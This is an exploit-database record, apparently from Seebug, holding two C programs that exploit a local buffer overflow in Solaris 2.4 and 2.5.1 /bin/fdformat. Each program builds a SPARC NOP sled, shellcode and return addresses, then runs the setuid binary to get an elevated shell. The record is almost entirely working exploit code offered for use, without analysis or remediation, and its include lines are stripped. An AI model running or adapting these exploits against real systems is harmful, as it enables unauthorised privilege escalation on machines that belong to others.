Description
No description provided by source.
{"sourceData": "\n ---------------------------\u00a0lion24.c\u00a0---------------------------------\r\n/*\r\nSolaris\u00a02.4\r\n*/\r\n\r\n\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0#define\u00a0BUF_LENGTH\u00a0264\r\n\u00a0\u00a0\u00a0#define\u00a0EXTRA\u00a036\r\n\u00a0\u00a0\u00a0#define\u00a0STACK_OFFSET\u00a0-56\r\n\u00a0\u00a0\u00a0#define\u00a0SPARC_NOP\u00a00xa61cc013\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0u_char\u00a0sparc_shellcode[]\u00a0=\r\n\r\n\u00a0\u00a0\u00a0"\\x2d\\x0b\\xd8\\x9a\\xac\\x15\\xa1\\x6e\\x2f\\x0b\\xda\\xdc\\xae\\x15\\xe3\\x68"\r\n\u00a0\u00a0\u00a0"\\x90\\x0b\\x80\\x0e\\x92\\x03\\xa0\\x0c\\x94\\x1a\\x80\\x0a\\x9c\\x03\\xa0\\x14"\r\n\u00a0\u00a0\u00a0"\\xec\\x3b\\xbf\\xec\\xc0\\x23\\xbf\\xf4\\xdc\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc"\r\n\u00a0\u00a0\u00a0"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01"\r\n\u00a0\u00a0\u00a0"\\x91\\xd0\\x20\\x08"\r\n\u00a0\u00a0\u00a0;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0u_long\u00a0get_sp(void)\r\n\u00a0\u00a0\u00a0{\r\n\u00a0\u00a0\u00a0__asm__("mov\u00a0%sp,%i0\u00a0\\n");\r\n\u00a0\u00a0\u00a0}\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0void\u00a0main(int\u00a0argc,\u00a0char\u00a0*argv[])\r\n\u00a0\u00a0\u00a0{\r\n\u00a0\u00a0\u00a0char\u00a0buf[BUF_LENGTH\u00a0+\u00a0EXTRA\u00a0+\u00a08];\r\n\u00a0\u00a0\u00a0long\u00a0targ_addr;\r\n\u00a0\u00a0\u00a0u_long\u00a0*long_p;\r\n\u00a0\u00a0\u00a0u_char\u00a0*char_p;\r\n\u00a0\u00a0\u00a0int\u00a0i,\u00a0code_length\u00a0=\u00a0strlen(sparc_shellcode),dso=0;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0if(argc\u00a0>\u00a01)\u00a0dso=atoi(argv[1]);\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0long_p\u00a0=(u_long\u00a0*)\u00a0buf\u00a0;\r\n\u00a0\u00a0\u00a0targ_addr\u00a0=\u00a0get_sp()\u00a0-\u00a0STACK_OFFSET\u00a0-\u00a0dso;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\
u00a0=\u00a00;\u00a0i\u00a0<\u00a0(BUF_LENGTH\u00a0-\u00a0code_length)\u00a0/\u00a0sizeof(u_long);\u00a0i++)\r\n\u00a0\u00a0\u00a0*long_p++\u00a0=\u00a0SPARC_NOP;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0char_p\u00a0=\u00a0(u_char\u00a0*)\u00a0long_p;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0code_length;\u00a0i++)\r\n\u00a0\u00a0\u00a0*char_p++\u00a0=\u00a0sparc_shellcode[i];\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0long_p\u00a0=\u00a0(u_long\u00a0*)\u00a0char_p;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0EXTRA\u00a0/\u00a0sizeof(u_long);\u00a0i++)\r\n\u00a0\u00a0\u00a0*long_p++\u00a0=targ_addr;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0printf("Jumping\u00a0to\u00a0address\u00a00x%lx\u00a0B[%d]\u00a0E[%d]\u00a0SO[%d]\\n",\r\n\u00a0\u00a0\u00a0targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);\r\n\u00a0\u00a0\u00a0execl("/bin/fdformat",\u00a0"fdformat\u00a0\u00a0\u00a0",\u00a0&buf[0],(char\u00a0*)\u00a00);\r\n\u00a0\u00a0\u00a0perror("execl\u00a0failed");\r\n\u00a0\u00a0\u00a0}\r\n------------------------------\u00a0end\u00a0of\u00a0lion24.c\u00a0--------------------------\r\n\r\n--------------------------------\u00a0lion25.c\u00a0------------------------------\r\n/*\u00a0\r\nSolaris\u00a02.5.1\u00a0-\u00a0this\u00a0exploited\u00a0was\u00a0compiled\u00a0on\u00a0Solaris2.4\u00a0and\u00a0tested\u00a0on\r\n2.5.1\r\n*/\r\n\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0#define\u00a0BUF_LENGTH\u00a0364\r\n\u00a0\u00a0\u00a0#define\u00a0EXTRA\u00a0400\r\n\u00a0\u00a0\u00a0#define\u00a0STACK_OFFSET\u00a0704\r\n\u00a0\u00a0\u00a0#define\u00a0SPARC_NOP\u00a00xa61cc013\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0u_char\u00a0sparc_shellcode[]\u00a0=\r\n\r\n\u00a0\u00a0\u00a0"\\x2d\\x0b\\xd8\\x9a\\xac\\x15\\xa1\\x6e\\x2f\\x0b\\xda\\xdc\\xae\\x15\\xe3\\x6
8"\r\n\u00a0\u00a0\u00a0"\\x90\\x0b\\x80\\x0e\\x92\\x03\\xa0\\x0c\\x94\\x1a\\x80\\x0a\\x9c\\x03\\xa0\\x14"\r\n\u00a0\u00a0\u00a0"\\xec\\x3b\\xbf\\xec\\xc0\\x23\\xbf\\xf4\\xdc\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc"\r\n\u00a0\u00a0\u00a0"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01"\r\n\u00a0\u00a0\u00a0"\\x91\\xd0\\x20\\x08"\r\n\u00a0\u00a0\u00a0;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0u_long\u00a0get_sp(void)\r\n\u00a0\u00a0\u00a0{\r\n\u00a0\u00a0\u00a0__asm__("mov\u00a0%sp,%i0\u00a0\\n");\r\n\u00a0\u00a0\u00a0}\r\n\u00a0\u00a0\u00a0void\u00a0main(int\u00a0argc,\u00a0char\u00a0*argv[])\r\n\u00a0\u00a0\u00a0{\r\n\u00a0\u00a0\u00a0char\u00a0buf[BUF_LENGTH\u00a0+\u00a0EXTRA\u00a0+\u00a08];\r\n\u00a0\u00a0\u00a0long\u00a0targ_addr;\r\n\u00a0\u00a0\u00a0u_long\u00a0*long_p;\r\n\u00a0\u00a0\u00a0u_char\u00a0*char_p;\r\n\u00a0\u00a0\u00a0int\u00a0i,\u00a0code_length\u00a0=\u00a0strlen(sparc_shellcode),dso=0;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0if(argc\u00a0>\u00a01)\u00a0dso=atoi(argv[1]);\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0long_p\u00a0=(u_long\u00a0*)\u00a0buf\u00a0;\r\n\u00a0\u00a0\u00a0targ_addr\u00a0=\u00a0get_sp()\u00a0-\u00a0STACK_OFFSET\u00a0-\u00a0dso;\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0(BUF_LENGTH\u00a0-\u00a0code_length)\u00a0/\u00a0sizeof(u_long);\u00a0i++)\r\n\u00a0\u00a0\u00a0*long_p++\u00a0=\u00a0SPARC_NOP;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0char_p\u00a0=\u00a0(u_char\u00a0*)\u00a0long_p;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0code_length;\u00a0i++)\r\n\u00a0\u00a0\u00a0*char_p++\u00a0=\u00a0sparc_shellcode[i];\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0long_p\u00a0=\u00a0(u_long\u00a0*)\u00a0char_p;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0EXTRA\u00a0/\u00a0sizeof(u_long);\u00a0i++)\r\n\u00a0\u00a0\u00a0*long_p++\u00a0=targ_addr;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a
0printf("Jumping\u00a0to\u00a0address\u00a00x%lx\u00a0B[%d]\u00a0E[%d]\u00a0SO[%d]\\n",\r\n\u00a0\u00a0\u00a0targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);\r\n\u00a0\u00a0\u00a0execl("/bin/fdformat",\u00a0"fdformat",\u00a0&\u00a0buf[1],(char\u00a0*)\u00a00);\r\n\u00a0\u00a0\u00a0perror("execl\u00a0failed");\r\n\u00a0\u00a0\u00a0}\r\n\r\n---------------------------\u00a0end\u00a0of\u00a0lion25.c\u00a0-------------------------------\r\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-7728", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-7728", "type": "seebug", "viewCount": 5, "references": [], "lastseen": "2017-11-19T21:52:01", "published": "2007-12-26T00:00:00", "cvelist": [], "id": "SSV:7728", "enchantments_done": [], "modified": "2007-12-26T00:00:00", "title": "Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645317471, "score": 1659785532, "epss": 1678851499}}